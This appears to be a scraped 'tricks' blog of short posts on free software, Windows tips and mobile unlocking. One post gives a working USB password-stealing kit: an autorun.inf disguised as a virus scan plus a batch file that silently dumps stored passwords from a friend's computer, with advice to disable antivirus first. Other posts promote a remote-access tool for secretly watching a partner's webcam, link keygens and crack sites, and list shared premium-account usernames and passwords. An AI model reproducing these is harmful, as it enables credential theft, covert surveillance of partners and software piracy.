USE FULL TRICS


Top 5 Free Screen Recorders to Record Your Screen Activities



Capture, edit and share any type of video

You probably sometimes spend hours explaining to someone, over the internet how to do something. Instead of typing at people, you can create screen recordings for them and shown them what you´re talking about. Especially if you have your own site and write tutorials, then it´s very useful to create video tutorials. For that you need ascreen recorder.I´ve tested a few free screen recorder and make a list of the best.


1. CamStudio

Cam Studio is easy to use, small size , pretty good screen quality and can record your screen session to .avi files or to .swf . For sure, the best free screen recorder, at least by my opinion.

Download CamStudio

File size: 1.20 MB
Supported: Win All

Here is a video tutorial how to configure the settings and use Camstudio to screen record video tutorials:




2. Wink

Wink offer a lot of options ( add image , audio,textbox…it´s something like windows movie maker that can record screen), but has few limitation; you can record the screen only to .swf, also is complicated to use

Download Wink

File size: 3272 kb
Supported: Win All


3. Jing

Jing is my favourite. Jing is simple application that can capture video and image. Unfortunately, record only to swf. files. Still it's an easy to use software and i recommend you to try it.

Download Jing

File size: 9.1 MB
Windows System Requirements:
  • Windows XP, Vista, or Windows 7
  • Microsoft .NET Framework 3.0
  • Broadband recommended

4. Free Screen Recorder

Free Screen Recorder is another screen recording software that can be used to capture screen activities into a AVI video file. Free screen recorder records every moment including mouse cursor movements, typing etc.

You can also record voice from the microphone which makes it easier to add your own commentary while the video is being recorded.

Download Free Screen Recorder

File size: 591KB
Supported: Win All


5. Freez Screen Recorder

Freez Screen Recorder allows you to record videos and also pause them. Like all the other softwares you can record any region of the screen oractivities in a particular window in addition to recording all the activities of the full screen.

It also supports voice recording from the microphone, videotape or Internet.

Download Freez Screen Recorder

File size: 772KB
Supported: Windows 2003, XP, 2000, 98, Me, NT


* Camtasia Studio (Shareware)

Camtasia Studio is the complete professional solution for recording, editing and sharing high-quality screen video on the Web, CD-ROM and portable media players, including iPod.

Easily record your screen, PowerPoint, multiple audio tracks, and webcam video to create compelling training videos, screencasts, and presentations without ever leaving your desk. With the power of interactive Camtasia Studio videos, you can deliver high-quality content anytime, to even your most remote audience.

Download Camtasia Studio
Download Keygen For Camtasia
This software is shareware (30-day trial), but you can search for a serial number and use it forever for free ;).... Check out this posts: How To Get Cracks and Serials to Any Program using Craagle




Protect your USB Flash Drive Contents with Password Lock

USB Safeguard Software to encrypt and protect data with a password on your removable pen drive.

USB Safeguard enables you to encrypt and password protect sensitive data on your USB drive. You can selected one or more folders to be encrypted and choose to securely delete the original (unencrypted) files with the built-in file shredder.


Lock your USB Pen Drive with Password : USB Safeguard


Simply drag and drop files and folders to quickly protect your sensitive documents, and then enter an password to encrypt and decrypt the files that you want to protect from prying eyes.


The program also includes a handy Safe Browsing feature that allows you to launch Internet Explorer without leaving any Internet traces on the host computer. Other features include an on-screen keyboard for secure password input and free space wiping.

Download USB Safeguard

USB Safeguard uses 256-bit AES encryption to protect your date. The program is not installed on your PC, it runs directly from your USB pen drive.




How to Hack Passwords Using USB Pen Drive

Hacking passwords or any information using USB pendrive. Learn how to steal information or passwords of your friends or enemies using pendrives...

Today I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you'll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.



ptimize Windows for better gaming using Game Booster

Game Booster will help squeeze the most out of your system and get games running more smoothly.

Assassin's Creed is one of my favourite games of all time. I can't stop playing this game. Just can't get enough of it :) You might have noticed that while playing games with heavy 3D graphics, PC response becomes slow. In some cases 3D games become jerky. The trick is to optimize PC for optimal game performance by reducing down resource consumption while playing game.

Optimize your PC for smoother, more responsive game play in the latest PC games with the touch of a button, Game Booster helps achieve the performance edge. It works by temporarily shutting down background processes, cleaning RAM, and intensifying processor performance. That means you can keep all the features of Microsoft Windows Vista and XP ready for when you need them, but turn them off when you are ready to get down to serious business – gaming. Game Booster makes it simpler to enjoy the latest games and take your experience to a new level.

CLICK HERE TO DOWNLOAD




Size: 626 KB
License: Freeware
Requires: Win 2K/03/XP/Vista 


Seven useful Windows 7 tips and tricks

1. Bypass the Recycle Bin
The Windows Recycle Bin is a good safeguard against accidental file deletions. However, when you know you want to permanently delete a file, you can bypass it. Instead of pressing the Del key, press Shift+Del, then Shift+Enter to confirm.
If you prefer, you can also permanently disable the Recycle Bin. First, right-click on the Recycle Bin, then choose Properties. Click on the drive you want to disable the Recycle Bin for, then select "Don't move files to the Recycle Bin. Remove files immediately when deleted." Click the OK or Apply button to save the changes.
Disable Recycle Bin (Credit: Screenshot by Ed Rhee)
2. Open Windows Explorer faster
Are you still mousing over to a Windows Explorer icon or double-clicking on My Computer to browse your files? Try pressing Windows Logo+E instead, to instantly launch Windows Explorer.
3. Enable underlining of keyboard shortcuts
Windows has many menu shortcut keys, but they're hidden by default. To enable the underlining of the shortcuts, go to Control Panel > Ease of Access Center > Change how your keyboard works. Click on the box next to "Underline keyboard shortcuts and access keys," then hit the OK or Apply button to save.
Enable underline shortcuts (Credit: Screenshot by Ed Rhee)
Underlined shortcuts
On the left, underlining is disabled. On the right, underlining is enabled.
(Credit: Screenshot by Ed Rhee)
4. Bypass the Windows splash screen
Disabling the Windows splash screen can shave a couple seconds from your total boot time. Launch the Windows Run command (Windows Logo+R), then type msconfig. Under the Boot tab, check the box next to "No GUI boot." Hit the OK or Apply button to save the changes.
Bypass Windows splash screen (Credit: Screenshot by Ed Rhee)
5. Lock Windows quickly
Whether you're at the office, library, or cafe, it's always a good idea to lock Windows before you step away. To lock Windows quickly, press Windows Logo+L.
6. Show hidden files, folders, and drives
To view files, folders, and drives that Windows hides, open the Windows search box (Windows Logo) and type folder. Next, select Folder Options from the search list and navigate to the View tab. Under Hidden files and folders, check the box next to "Show hidden files, folders, and drives."
Show hidden files (Credit: Screenshot by Ed Rhee)
7. Rename multiples files
To rename multiple files in Windows, highlight the files you want to rename, then hit the F2 key. Rename the first file, then hit Enter. All your files will be renamed and a number in parenthesis will be added to the end of the name. If you change your mind, you can hit Ctrl+Z to undo the rename.
Files to rename
Original file names to rename.
(Credit: Screenshot by Ed Rhee)
Files renamed
New file names.
(Credit: Screenshot by Ed Rhee)
That's it. If you know of any other cool Windows tips and tricks, feel free to share them in the comments.





How to Recover Deleted SMS from SIM or Phone Memory

Recover Deleted SMS Messages From Your Cell Phone for Free

Have you deleted SMS messages that you wish had not gotten deleted? You will be happy to know there are a number of different software that can help you recover the messages you need and want, but not all of them are free and you need to purchase the software. However, if you own a Nokia phone you might be in luck, as there are very good chances of message recovery from your cellphone without need of any specialized data recovery software for free. In this tutorial I will explain, what are the steps to be followed in order to recover deleted SMS from a SIM card or phone memory.

1. First of all download and install FExplorer, excellent file manager and also sends files via bluetooth.


2. Launch FExplorer and navigate to C: if you use Phone Memory to store your messages (default) and D: if you use Storage Card as your SMS storage location.

3. Now navigate to and open "system" folder.

4. Now open the "mail" folder.

5. This folder should contain many folders named similar to 0010001_s etc. with files named similar to 00100000 etc. These files are the actual deleted messages. Simply, use the FExplorer inbuild text viewer to view these files. You will need to browse through every folder and open all files inside them until you get the required SMS.

Thsi tool includes more great fetures like:
  • Cut, copy & paste files
  • Check date modified & size
  • Display free space available
  • View file with inbuilt text viewer
  • Cut, copy, create & paste directories
  • File find. (although this only works within a directory)
  • Take screenshots
  • Set your backlight to be permanently on
  • Send files via bluetooth. (may be necessary to rename .sis to .sis_)
  • Compress memory - increasing available free memory ...and much more.
All of all FExplorer is a handy file explorer application for your Series 60 phone. With a wide range of features, tips and tricks, FExplorer will become one of your favorite mobile applications!

Check for updates of FExplorer here


Top Sites to Find All The Serials You Need

Some of The Best Crack/Keygen Sites That Are Safe To Use.

Today there are many people out there who still prefer to use pirated software. It's especially common among users who live outside the U.S. When you download your program or game you might need the serial to remove the trial period. Blindly searching the web for cracks and keygens is about as smart as using Limewire to search for antivirus software – something not well-advised. Undoubtedly and unfortunately, the number of crack sites with overtones of a malicious agenda heavily outweigh sites that just want to serve up the honest goods. Having said that, there actually are quite a few creditable 'crack' sites that won't try to bombard you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Botnet army. Here i want to present you a list of "clean" crack sites for all the latest warez to unlock your software.

Please note that the site reviews herein only include information about each site, not the contents of the 'cracks' themselves. Always use a reputable antivirus and antispyware program on cracks & keygens before using them.

Here is my list of Safe and Malicious Crack/KeyGen Sites:

www.keygen.in

www.smartserials.com

www.keygenguru.com - Popular site with hundreds of thousands of results.

www.serialkey.net

www.zcrack.com

www.subserials.net

www.serialportal.com

supercracks.net

www.serialcrackz.com

www.serials.be

www.cracktop.com

www.cracksfm.com

www.cracklib.net

www.crackdb.org - The site itself is safe, however; many affiliate links are on the 'do-not-visit' list. When searching, skip past the first results (with the prices).

www.theserials.com

How to Unlock Mobile Phones - Mobile Unlocker

Here i'm posting an utility for unlocking Nokia, Siemens, Samsung, Vitel, Maxel, Panasonic, Motorola, LG, and AEG mobile phones. This utility also includes MasterCode calculator that can reset your Nokia security code if you have lost it.


WorldUnlock Codes Calculator features:
  • Unlock Nokia
  • Unlock LG
  • Unlock Panasonic
  • Unlock Maxon
  • Unlock Samsung
  • Unlock AEG/Telital
  • Unlock Alcatel
  • Unlock Siemens
  • Unlock Sony
  • Unlock Vitel
Easy guide to free Nokia unlocking:

(Please read the whole guide before starting)

Select phone model from list.
  • 2. Enter IMEI number of your phone (Press *#06# on phone)
  • Select country and service provider where the phone was bought.
  • Hit the button: Calculate!
  • The software generate some Nokia unlock codes.
  • If 7 codes are displayed, use the code ending with +7 first.
  • If it does not work, then try +1, and finaly +5.
  • When phone displays "Sim restriction off" it is unlocked.
  • If only two codes are displayed (+1 and +2) enter both of them!

Codes will be shown on the form: #pw+CODE+n#
To get p, w or +, pres the * button several times.

You enter the codes correctly by removing any simcard from the phone, turning the phone on and then enter the code.

Download WorldUnlock Codes Calculator


How To Speed Up My Internet Connection with Google Public DNS

A guide to getting more out of your internet connection without switching.

If you are looking to increase your internet speed without any expensive software then you came to right place. I will tell you how to increase your internet speed up to 50%-60 % with few clicks. I have applied this trick to my GPRS dial-up connection and my internet connection speed increased to almost double.
Here I will show you how to get fastest speed to load your websites by the using of Google public DNS. Domain Name System (DNS) is a database system that translates a computer’s fully qualified domain name into an IP address. For example, when you type pc-tips-hacks.blogspot.com in web browser then DNS translate pc-tips-hacks.blogspot.com to computer readable number known as IP address and when computer knows about the IP location of web domain name it simply opens website in the browser.


Our ISP (Internet Service Provider) provide their DNS which are located at router. Sometimes DNS server of ISP is very slow then it takes so much time to find out the web address and open the website. To solve this problem you can replace your ISP’s DNS service with Google Public DNS by changing the settings of the network connection.

1) Go to Start -> Control Panel


2) Click on Network Connections in Control Panel


3) Right click on Local Area Connection and then click on Properties


4) Select Internet Protocol (TCP/IP) and then click on properties


5) Select Use the following DNS server addresses in filed Preferred DNS server type 8.8.8.8 and in Alternate DNS server type 8.8.4.4


Hope this tutorial was useful for you. 



Free Premium Accounts for 13 Download Sites - Download Music, Movies, Games, Software and Much More

Best Download Sites - Get full version Games, Applications, Movies, MP3s, TV Shows, eBooks, Software, Security/Hacking Tools...

In this article i will share a list of usernames and passwords of the premium accounts for Best download sites. All of the accounts are working 100%.


Here is the list:

1. www.butterflydownloadnetwork.com (Download Movies, Music, PC Games, TV Shows)

Username : cinemanetwork20
Password : butterfly20


2. www.downloadprofessional.com (Software, Movies, Music, TV Shows, Full version games)

Username : lo886Ees
Password : zAgt88er


3. www.divxcrawler.com (Direct Download Movies, Software and Music Videos)

Username : divx273
Password : 8342729


4. www.sharingzone.net (Games, Software, Movies, TV shows, Music and more)

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD


5. www.watchdirect.tv (Reality TV Shows, Comedy, Old Television Shows, Latest Headlines, Action/Adventure)

Username : cinemanetwork20
Password : butterfly20


6. www.unlimitedgamedownloads.com (Download all the latest Games, PSP Softwares...)

Username : ga20me
Password : ke01feb


7. www.fullreleasez.com (Full version games, software, movies, music, tv shows...)
Username : Af872HskL
Password : XjsdH28N


8. www.fulldownloads.us (Everything you need)

Username : Af872HskL
Password : XjsdH28N


9. www.pirateaccess.com (Applications, Games, Movies, MP3s, TV, eBooks, Security/Hacking, Rapidshare)

Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5


10. www.alphaload.com (Signing up with iLoad comes with a great service, fair prices and an awesome software, which are offered for free for all customers)

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS


11. www.gamedownloadnow.com (Unlimited Game Downloads)

Username : ga20me
Password : ke01feb


12. www.unlimiteddownloadcenter.com (Download Music, Movies & Games)

Username : cu20me
Password : ke01feb


13. www.tvadvanced.com (Online TV, Movies, Music, Games...)

Username : mv03dl
Password : frmvdl 




Get a Free Serial License Key for Avira Premium Security 10

Avira is one of the leading Antivirus Company. Avira Premium Security 10 provides a complete protection from viruses, spywares, intrusions and other online threats. It also has a backup system to protect your important data. The license key of Avira Premium Security is of $31.59 for 1 year. Now you can get it free for six months by using a special promotional offer.



Avira Premium Security Suite is essential if you:

  1. Rely on the internet for everything
  2. Regularly shop and buy from online retailers, or bid on auction sites
  3. Ever access your bank or financial accounts online
  4. Chat, communicate and social network constantly
  5. Share your computer with your partner or other family members
  6. Worry about keeping your precious family memories safe – all those photos and movies stored on your PC
  7. Are concerned about what your children might see and do online


How To Download Avira Premium Security 10 with 6 Months Serial License Key





  • Click on Request License Now button
  • Now Click on License Overview button and on the next page click on the yellow keys to download you Serial key (HBEDV.KEY) for Avira Premium Security 10




Now install this key and your Avira Premium Security 10 will get activated for 6 months





Top 10 Free CD/DVD burning Softwares

Download free CD and DVD burner software to create and burn audio or data CDs. Burn DVDs and Blu-ray discs.

I've been using Nero all the time and in my opinion it's the best software to write CD and DVD. But there are so many free softwares which help you to do the same. Here is my list of top 10 free burning softwares that you can use in place of Nero.

1. ImgBurn - ImgBurn is probably the best free CD/DVD burning tool available. ImgBurn can write most types of CD / DVD images including BIN, DI, DVD, GI, IMG, ISO, MDS, NRG and PDI. ImgBurn supports all the Windows OS’s – Windows 95, 98, Me, NT, 2000, XP, 2003 and Vista (including all the 64-bit versions). If you use Wine, it should also run on Linux and other x86-based Unixes.

2. CDBurnerXP - CD Burner XP is a great software. Apart from CDs and DVDs, you can also burn Blu-Ray and HD-DVDs with it. It also includes the feature to burn and create ISOs, as well as a Multilanguage interface.
Operating Systems supported- Windows 2000/XP/2003 Server/Vista.

3. InfraRecorder - Infra Recorder can burn CD, DVD, Dual Layer DVDs and also supports various audio formats. The audio and data tracks includes .wav, .wma, .ogg, .mp3 and .iso formats. It can erase rewritable discs. Infra Recorder can also burn images in ISO and BIN/CUE formats.It supports multisession writing of discs.

4. Express Burn - Express Burn is a free CD burning program that lets you create and record audio and data CDs under Windows and Mac OS X. This software has a great user friendly interface. To use it all you need to do is drag and drop files. One thing surprises me; well I don’t know how far it’s true; the makers of this software claim that Express Burn is the fastest CD/DVD writing program in the world using proprietary optimizing systems.

5. FinalBurner Free Edition - FinalBurner is one more top free burning software. It can create data, audio and video discs. It can burn CD R/RW, DVD+R/RW, DVD-R/RW, and DVD DL. It can also rip Audio CD in .wav, .mp3, .ogg, .mid, .wma, .aac, .mp4, .m4a, .xm, .mod, .s3m, .it, .mtm, .mo3 audio files. FinalBuner can burn Video DVD with formats AVI, DIVX, XVID, MP4, MPG, WMV, ASF, MOV, FLV, etc. FinalBurner can also create an ISO image of a disc.

6. Ultimate CD/DVD Burner - Ultimate CD/DVD Burner is a simple and easy to use CD and DVD burning software package. It supports a very wide range of internal and external (USB 2.0 and FireWire) CD and DVD writers. Burn any data, copy any disc, make backups, create astonishing photo CD albums, make ISO CDs with this very easy to handle software!

7. StarBurn - StarBurn is a CD/DVD/Blu-Ray/HD-DVD disc burning software. It's been a long time since I've seen such a good free software. The number of features is quite impressive. You can burn data, audio, video, image discs. You can also grab or compress audio files.

8. Your Free DVD Burner - Your Free DVD Burner is a good one which isn’t much popular. It has some powerful features which is the reason it makes into this list. It can create data DVDs and CDs. It also supports DVD Video. YourFree DVD Burner allows you to create multisession CDs. You can create Bootable CD/DVD discs. It can burn ISO images onto disc. It supports CD-R, CD-RW, DVD-R, DVD-RW, DVD-RAM, DVD+R, DVD+RW and DVD+R disc formats. Rewritable CDs and DVDs can be erased.

9. BurnAware - BurnAware allows you to easily perform the most common disc burning operations: write to all CD/DVD media types, including Blu-Ray (BD-R/BD-RE); create and burn disc images; write multi-session discs; verify the integrity of files; burn your compilations directly on optical media, without having to wait for hard drive staging first and much more.
Operating systems supported- NT, 2000, XP and Vista.

10. Create-Burn ISO Image - Free Create-Burn ISO a good free CD/DVD burner. It can burn CD-R, CD-RW, DVD+R/RW, and DVD-R/RW discs. It can also create ISO image for burning CD/DVD. Burn ISO image can also create bootableCDs and DVDs. After burning the disc, Burn ISO Image can verify written data for finding any writing errors. It can erase re-writable CDs and DVDs. It supports Joiet File System, ISO, UDF& ISO/UDF project.






Free PDF Editor: Hack Acrobat Adobe PDF Files

Here i will give you one PDF Editor for free. Nitro PDF Professional is one of the best PDF Editors on the market. It allows you to create, convert, edit, combine, secure, annotate, form-fill, and save 100% industry-standard PDF files… It worth to have!


Nitro PDF Professional is an affordable, fully-featured PDF creation and editing product. The professional application gives you full control over PDF documents, including creation, commenting, form-filling and authoring, digital signatures, text editing, one-click creation from Microsoft Office and more.

Features:
  • Create PDF
  • Edit PDF
  • Convert PDF
  • Review & annotate PDF
  • PDF forms
  • Secure PDF
  • Assemble & combine PDF
How to install:

1. Download Nitro PDF Professional from here.

2. Extract it to your computer and install as usual software.

3. After open program and press activate (activate manually browse)


4. Run keygen.exe activation key , fill the installation id and get activation key and activate

 



How to Unlock iPhone and iPod Touch - iPhone Unlocker

Yesterday I found great software called iPhone Unlocker, that allows you to unlock unlimited iPhones and iPods. iPhone Unlocker is developed using the finest development programs and is developed with simplicity in mind. From the moment you download this software your iPhone will be unlocked and ready for use on any network worldwide in just a matter of minutes with absolutely no technical knowledge required.


Connect your iPhone to the computer, select the options to the right and click the Free my iPhone button to unlock your phone. All versions including 1.1.3 supported! (only jailbreak supported on iPod Touch).

Download iPhone Unlocker






Get a Free iPhone Navigator

In this post I present iPhone navigator called MotionX GPS Drive for iPhone and iPod Touch. Below you can find download link, size is 7.6 MB.


MotionX-GPS Drive turns any iPhone 3G or 3GS into the next-generation car and pedestrian navigation solution. MotionX introduces new features not yet seen on mobile device, including “door-to-door” personal navigation tools, user interface innovations that greatly simplify the navigation experience, and integration of live search capabilities.

Download MotionX GPS Drive




Get a Free Serial Key for Advanced SystemCare Pro

Who doesn’t like free stuff! I know you do, that’s why I’m going to give you this awesome system optimization tool - Advanced SystemCare Pro. In my personal opinion, IObit products especially the latest Advanced SystemCare PRO is my favorite and BEST system tuning software to keep my computer running like new. It provides an always-on, automated, all-in-one PC Health-care Service with anti-spyware, privacy protection, performance tune-ups, and system cleaning capabilities. This powerful and award-winning precision tool fixes stubborn errors, cleans out clutter, optimizes Internet and download speeds, ensures personal security, and maintains maximum computer performance automatically.

Here i am giving you a free serial key for Advanced SystemCare Pro Edition.


Have a great time using your Advanced SystemCare Pr



Get Free SandBoxie Serial Keys

Who doesn’t like free stuff! I know you do, that’s why I’m going to give you free serial keys for SandBoxie. As most of you know, Sandboxie will allow you to run your software downloads in a sandbox (in a separate memory area) to check whether or not they're what you were expecting. This can be great if you don't trust a download or freeware. This software is used to protect your computer from being affected from various hacking software loopholes.

You can read more about SandBoxie here.


Free SandBoxie Keys:

User: Serial

  1. test: CXKEJJB
  2. Freeware: 95VEMA1
  3. FreeSandBoxie: ENKX652
  4. SandBoxieIsFree: YF8SZC2
  5. SandBoxie: EFJ3BJA
  6. A: S6JEW41
  7. B: L4ERQGB
  8. C: 5VRJ9TA
  9. D: JYVCST1
  10. E: C3D5CA2
  11. F: 5S2WG9B
  12. G: KCRWRCB
  13. Creator: 3AKGF72

How To Test Hacking Tools Without a Risk of Infection

I was asked by many newbies over here about basic hacking software that every hacker should have. I have until now mentioned about various free software downloads. In this security article, i will mention about software used by hacker to protect his computer from being affected from various hacking software loopholes, Sandboxie.


What is Sandboxie?


Generally, if you are visiting hacking forums or various forums of free software downloads, some of these free downloads are affected or are attached viruses and trojans for malicious purposes. So, if victim installs them on his computer, the malicious scripts get installed on computer causing various problems depending on script. So, the better way is to install such applications on your PC but using Sandboxie.

Sandboxie will allow you to run your software downloads in a sandbox (in a separate memory area) to check whether or not they're what you were expecting. This can be great if you don't trust a download or freeware.


The red arrows indicate changes flowing from a running application program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Sandboxie features:

  • Secure Web Browsing:
Running your Web browser under the security protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox of Sandboxie and can be discarded trivially.
  • Enhanced Privacy:
Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows OS (Operating system).
  • Windows Stays Clean:
Prevent wear-and-tear in Windows by installing software into an isolated sandbox provided by Sandboxie.

Requirements for Sandboxie:


Sandboxie supports windows 2000, windows XP, windows Vista and windows Server 2003.
Sandboxie does not work on Windows 95, 98 or ME, or on Mac operating systems.
There are no particular hardware requirements. Sandboxie needs only a small amount of memory and should have a very small impact on performance.

Windows 2000 users:
You may need to install GDIPLUS.DLL if you don't already have it.

Languages that Sandboxie support:

English, Chinese (Simplified), Finnish, German, Japanese, Korean, Polish, Portuguese (Brazil) and Turkish.

Download Sandboxie

So friends, download this free software, Sandboxie, and protect your computer from harmful viruses, and scripts. Now on, no need to spend time in removing malicious software. Just install Sandboxie and start installing free softwares without any fear. 


Command Prompt Is Blocked? How To Find an Alternative

Most of the computers that have public access to people has Command Prompt blocked. This is for security reasons. Some time you may want to view hidden files in the public computer using command prompt (in case Folder options settings is not available). Lack of Command Prompt will be great loss of if you want to hack in to the networking or the same pc.
There are several tweaks and hacks to enable command prompt, but it is so much tricky. I am introducing you with a nice alternative for command prompt.
Have a look at the screenshot. It supports all the features that Command Prompt does. Even all the wild cards that can be used in DOS(Disk Operating System).


Download Greg's DOS Shell

It is actually a DOS Shell, which interpets user command same as in DOS.

Hope this post was a great help. 



How To Protect Your Computer From Virus By Disabling Autorun

Most of the computer seems to get transferred from flash drives, pen drives and other portable and removable media. As soon as you plug and play your removable storage media, the windows’ default feature will search for Autorun.inf file which contains all the information about the things to do when media is plugged in.

It can execute programs (probably virus) which are already in removable storage media. Eventually the programs copies itself to the hard drive.

Therefore it is necessary to turn of autorun feature in your windows to get rid of viruses.

In this short tutorial I am going to teach you how to disable your system from searching and executing autorun.inf as soon as the removable storage is plugged in.

Follow this simple step by step tutorial.

First go to Start-> Run

Type: gpedit.msc in run window and press OK button.

It will load the group policy editor window.

In the explorer sidebar at the left, open Computer configuration tree. Inside it open Administrative templates. Again open System folder. (refer to the image below).

Click on the image to Enlarge

At the right side, scroll down for the “Turn off Autoplay”.

Double click to open it.

Click on “Enabled” button and choose “all drives”.


And click on OK button.

Again in explorer sidebar at the left, open User configuration tree. Inside it open Administrative templates. Again open System folder. (refer to the image below).

Click on the image to Enlarge

At the right side, scroll down for the “Turn off Autoplay”.

Double click to open it. Apply the same settings as above and click on OK button.

Restart you PC.

Now onwards, your removable media won’t autoplay making your desktop more secure from virus. 




How To Recover Your Computer After Virus Attack

Even after the virus is totally removed from the system, some users find it difficult to restore all those things back which were affected by the virus. A virus usually when enters into a system disables the registry editor and task manager so that the user can not remove the virus from the system.

Here is a free tool Re-Enable using which even a novice users can fix all the things which were disabled by the virus. An antivirus can remove the virus files but sometimes it may fail to restore the system settings. In such situations this tool can come handy.

The program has the ability to restore functionality to these Windows features:
  • Windows Registry
  • Command Line Tool
  • Windows Task Manager
  • System Restore Config
  • Folder Options
  • Run command
  • My Computer
  • Task Scheduler
  • Right Click Context menu
  • Ms-Config (Xp only)
  • Control Panel
  • Search

You will require dot net 3.5 or higher version to run this software. Or if you don’t want to download .Net framework then you can try the portable version of this software.

Download Re-Enable




How to Check if Your Computer is Infected or Not

Lets start:

First Method: Checking the startup

1. Open the "Run" by pressing "windows key + r" or go to "Start", and then select "Run".
2. Type msconfig
3. A window will come up. Go to the "Startup" Tab.
4. Now as you can see, you have the list of all the applications that start with Windows. You can find almost every RAT/Stealer/Keylogger/bot...
5. Search for some file like "Stub.exe" ,"server.exe" ,"s3rver.exe"... This are the most used names.

If you found one uncheck it, and click on "Save". Reboot your computer, and you have successfully prevented the malware(s) to startup with the system.


Second Method:
Checking the Registry

In the registry every application saves its configuration, of course malware too. Malware often uses the Registry to startup, and Save the options.

1. Open the "Run" (Start -> Run)
2. Write regedit.exe
3. Search In The HKey_Current_User (HKCU) for the Software Folder.
4. There will be a list with the programs. If you are infected, you'll find something like Server or Stub, some sh*t like that.
5. If you found one, delete that entry (Right Click -> Delete Entry).

Third Method

1. Install Malwarebytes' Anti-Malware. It's really the best anti-malware. Check for updates and make a full scan. 



How to Hack and Spy on a Webcam

I get a lot of emails where my readers are asking for help to find out if his/her partner is cheating on them, chatting to someone she/he shouldn't be, etc. So here i decided to answer this question, and to get it clear once for all.
Today there are softwares called RATs (Remote Administrator Tools) that are mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it. With a RAT, you can make the party download files, view their desktop/webcam, and more.

Except the advantages of using a RAT, there are also few disadvantages that you should know about:

1. The RATs are detected by the most anti-virus software.
2. You can get infected by using a RAT.
3. You can get traced when you rat somebody.

In this article i am going to share A step by step guide that allows you to remotely access anybody's webcam, microphone, files and desktop from anywhere in the world, without to worry about the things i mention above.


You can install this on any PC and monitor who ever uses that PC, or even someone passing by. There are no system requirements and this works 99.9% of the time.

This also includes the ability to:
  • Access almost any computer anywhere without knowing the computer password or IP Address.
  • Record and watch any webcam at the same time.
  • Record desktop action and watch at the same time.
  • Dig deep into files, download then and upload new ones.
  • Watch a webcam from any PC in the world.
  • Monitor activities whenever that PC or laptop is online.
  • Save all recordings in a number of file types.
This software costs $19.95, but I think the price totally worth for a software like this one.

I have tested this from every single angle possible and have had the BEST success rate with it.



How To Speed Up Your Internet

If you are looking to increase your internet speed without any expensive software then you came to right place. I will tell you how to increase your internet speed up to 50%-60 % with few clicks. I have applied this trick to my GPRS dial-up connection and my internet connection speed increased to almost double.

Here is a guide for getting more out of your internet connection without switching:

1. First you need to open "Start" then "Run", check the picture below:


2. Now in "Run" write gpedit.msc

3. Next navigate to "Administrative Templates" -> "Network" -> "QoS Packet Scheduler"

4. In "QoS Packet Scheduler" click on "Limit reservable bandwitdh", and select Properties


